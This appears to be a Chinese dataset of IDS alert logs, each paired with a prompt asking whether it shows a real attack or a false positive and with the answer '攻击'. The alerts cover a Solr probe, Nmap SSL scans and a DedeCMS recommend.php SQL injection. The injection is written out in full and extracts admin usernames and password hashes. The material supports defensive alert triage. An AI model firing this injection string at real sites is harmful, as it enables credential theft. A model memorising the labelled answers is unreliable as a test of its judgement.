你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732715834", "vlan_id": "", "vuln_type": "Apache Solr 信息泄露漏洞", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.47.67", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732715834, "vuln_harm": "可能导致网站敏感信息泄露等", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.47.67", "site_app": "", "hit_end": 128, "uri": "/solr/admin/cores?action=STATUS&wt=json", "dport": 443, "vuln_name": "Apache Solr 信息泄露漏洞", "rsp_status": 0, "code_language": "", "solution": "目前官方已经发布新版本修改了该漏洞,建议您升级到对应的最新的版本。", "hit_start": 108, "detail_info": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "xff": "", "sip": "164.90.211.97", "vuln_desc": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "public_date": "2023-03-31 14:52:15", "sport": 12734}, "solution": "目前官方已经发布新版本修改了该漏洞,建议您升级到对应的最新的版本。", "hit_start": "108", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zb2xyL2FkbWluL2NvcmVzP2FjdGlvbj1TVEFUVVMmd3Q9anNvbiBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjI2OjQ0Mw0KVXNlci1BZ2VudDogR28taHR0cC1jbGllbnQvMS4xDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "file_md5": "", "host": "218.76.15.26:443", "host_state": "失败", "action": "STATUS", "rule_key": "webids", "connection": "close", "api": "218.76.15.26:443/solr/admin/cores", "first_access_time": "2024-11-27 21:57:14", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "德国--黑森州--美因河畔法兰克福", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache Solr 信息泄露漏洞", "alarm_sip": "172.23.47.67", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "726526efb47295568b21edac8cdc558d", "proto": "http", "xff": "", "alarm_id": "20241127_5485b96f7230190ee187faebc16194f7", "vuln_desc": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "attack_chain": "0x01020000", "access_time": "2024-11-27 21:57:14", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "vuln_harm": "可能导致网站敏感信息泄露等", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732715812", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "164.90.211.97", "public_date": "2023-03-31 14:52:15", "dimension": "3", "wt": "json", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/solr/admin/cores", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "128", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/solr/admin/cores?action=STATUS&wt=json", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002155e", "req_header": "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1\r\nHost: 218.76.15.26:443\r\nUser-Agent: Go-http-client/1.1\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "164.90.211.97", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571998-Apache Solr 信息泄露漏洞", "rule_labels": "{\"0x10070d\": {\"parent_id\": \"0x100700\", \"type\": \"服务类型\", \"name\": \"其他\", \"parent_name\": \"未授权访问\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"software\": \"Go-http-client/1.1\", \"hw_type\": \"PC\"}}", "host_md5": "b463958809b4db303f18ed43c2097043", "sport": "12734", "h_url": "/solr/admin/cores?action=STATUS&wt=json", "user-agent": "Go-http-client/1.1"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732715788", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.47.67", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732715788, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.23.47.67", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 443, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "46.101.223.77", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 32321, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACWJn9AAC0GPdYuZd9NrBcvQ35BAbtTI0pB4jgQDFAYAfYc9AAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 21:56:28", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFAACWJn9AAC0GPdYuZd9NrBcvQ35BAbtTI0pB4jgQDFAYAfYc9AAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.47.67", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "9c3d5ad869f3584cd0bdf920c1b51289", "proto": "ssl", "xff": "", "alarm_id": "20241127_d3d34fa72e39c248deda481c5d85d385", "attack_chain": "0x01050000", "access_time": "2024-11-27 21:56:28", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732715778", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "46.101.223.77", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "46.101.223.77", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "32321", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732708256", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.31.193.222", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732708256, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.31.193.222", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 443, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "64.227.119.56", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 22799, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACWEWNAAC0GFeZA43c4rB/B3lkPAbs0Umhr4cUkzFAYAfbxcwAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 19:50:56", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFAACWEWNAAC0GFeZA43c4rB/B3lkPAbs0Umhr4cUkzFAYAfbxcwAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.31.193.222", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "6d431b4dbf284b47e290f4188e350305", "proto": "ssl", "xff": "", "alarm_id": "20241127_74aa0bb905f11967e478cb77e54234fa", "attack_chain": "0x01050000", "access_time": "2024-11-27 19:50:56", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "443", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732708241", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "64.227.119.56", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "64.227.119.56", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "22799", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732704383", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732704383, "vuln_harm": "被SQL注入后可能导致以下后果:\r\n1.网页被篡改;\r\n2.数据被篡改;\r\n3.核心数据被窃取;\r\n4.数据库所在服务器被攻击变成傀儡主机", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.64.208", "site_app": "DedeCMS", "hit_end": 0, "uri": "/plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294", "dport": 80, "vuln_name": "Dedecms recommend.php SQL注入漏洞", "rsp_status": 0, "code_language": "PHP", "solution": "升级至最新版确保其他漏洞也一并修复。", "hit_start": 0, "detail_info": "目标存在SQL注入漏洞。1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。", "xff": "", "sip": "39.180.68.203", "vuln_desc": "目标存在SQL注入漏洞。1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。", "public_date": "2014-06-26 00:00:00", "sport": 6497}, "detail_info": "目标存在SQL注入漏洞。1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。", "file_md5": "a3d582e0dfc71f762ff50ec07aa489ea", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hnsee.cn/plus/recommend.php", "first_access_time": "2024-11-27 18:46:23", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "", "h_method": "GET", "sip_addr": "中国--浙江省--丽水市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Dedecms recommend.php SQL注入漏洞", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "18b85b0c916ce9e086da58a0d3fafbef", "xff": "", "vuln_desc": "目标存在SQL注入漏洞。1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。", "aid": "1", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果:\r\n1.网页被篡改;\r\n2.数据被篡改;\r\n3.核心数据被窃取;\r\n4.数据库所在服务器被攻击变成傀儡主机", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732704365", "code_language": "PHP", "public_date": "2014-06-26 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "DedeCMS", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002009d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "39.180.68.203", "host_md5": "f277d9e25889aee14f4872ea879149f4", "accept-encoding": "gzip,deflate", "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", "referer": "http://www.hnsee.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294", "vlan_id": "", "vuln_type": "Dedecms recommend.php SQL注入漏洞", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "升级至最新版确保其他漏洞也一并修复。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9wbHVzL3JlY29tbWVuZC5waHA/YWN0aW9uPSZhaWQ9MSZfRklMRVMlNUJ0eXBlJTVEJTVCdG1wX25hbWUlNUQ9JTVDJTI3JTIwb3IlMjBtaWQ9QCU2MCU1QyUyNyU2MCUyMC8qITUwMDAwdW5pb24qLy8qITUwMDAwc2VsZWN0Ki8xLDIsMywoc2VsZWN0JTIwQ09OQ0FUKDB4N2MsdXNlcmlkLDB4N2MscHdkKStmcm9tKyU2MCUyM0BfX2FkbWluJTYwJTIwbGltaXQrMCwxKSw1LDYsNyw4LDklMjMmX0ZJTEVTJTVCdHlwZSU1RCU1Qm5hbWUlNUQ9MS5qcGcmX0ZJTEVTJTVCdHlwZSU1RCU1QnR5cGUlNUQ9YXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtJl9GSUxFUyU1QnR5cGUlNUQlNUJzaXplJTVEPTQyOTQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wOyAuTkVUNC4wQzsgLk5FVDQuMEUpDQpSZWZlcmVyOiBodHRwOi8vd3d3Lmhuc2VlLmNuL3BsdXMvcmVjb21tZW5kLnBocD9hY3Rpb249JmFpZD0xJl9GSUxFU1t0eXBlXVt0bXBfbmFtZV09XCUyNyUyMG9yJTIwbWlkPUBgXCUyN2AlMjAvKiE1MDAwMHVuaW9uKi8vKiE1MDAwMHNlbGVjdCovMSwyLDMsKHNlbGVjdCUyMENPTkNBVCgweDdjLHVzZXJpZCwweDdjLHB3ZCkrZnJvbStgJTIzQF9fYWRtaW5gJTIwbGltaXQrMCwxKSw1LDYsNyw4LDklMjMmX0ZJTEVTW3R5cGVdW25hbWVdPTEuanBnJl9GSUxFU1t0eXBlXVt0eXBlXT1hcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0mX0ZJTEVTW3R5cGVdW3NpemVdPTQyOTQNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCxkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuLHpoLGVuDQpIb3N0OiB3d3cuaG5zZWUuY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hnsee.cn", "host_state": "失败", "accept-language": "zh-cn,zh,en", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_380db0c92be688ac36a47e5a635842b1", "access_time": "2024-11-27 18:46:23", "attack_addr": "中国--浙江省--丽水市(28.453939/119.918609)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "39.180.68.203", "dimension": "3", "url_path": "/plus/recommend.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "recommend.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294 HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\nReferer: http://www.hnsee.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: zh-cn,zh,en\r\nHost: www.hnsee.cn\r\nConnection: Keep-Alive\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268566685-Dedecms recommend.php SQL注入漏洞", "rule_labels": "{}", "sport": "6497", "h_url": "/plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732704383", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732704383, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "其他", "hit_end": 988, "uri": "/plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294", "dport": 80, "vuln_name": "SQL注入攻击", "rsp_status": 0, "code_language": "其他", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 968, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "39.180.68.203", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2018-08-08 12:00:00", "sport": 6497}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "a3d582e0dfc71f762ff50ec07aa489ea", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hnsee.cn/plus/recommend.php", "first_access_time": "2024-11-27 18:46:23", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--浙江省--丽水市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "8be3e9b128184784634741d418b3a612", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "aid": "1", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732704365", "code_language": "其他", "public_date": "2018-08-08 12:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "988", "h_proto_version": "HTTP/1.1", "uri": "/plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001483", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "39.180.68.203", "host_md5": "f277d9e25889aee14f4872ea879149f4", "accept-encoding": "gzip,deflate", "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", "referer": "http://www.hnsee.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294", "vlan_id": "", "vuln_type": "SQL注入攻击", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "968", "skyeye_id": "", "payload": {"req_header": 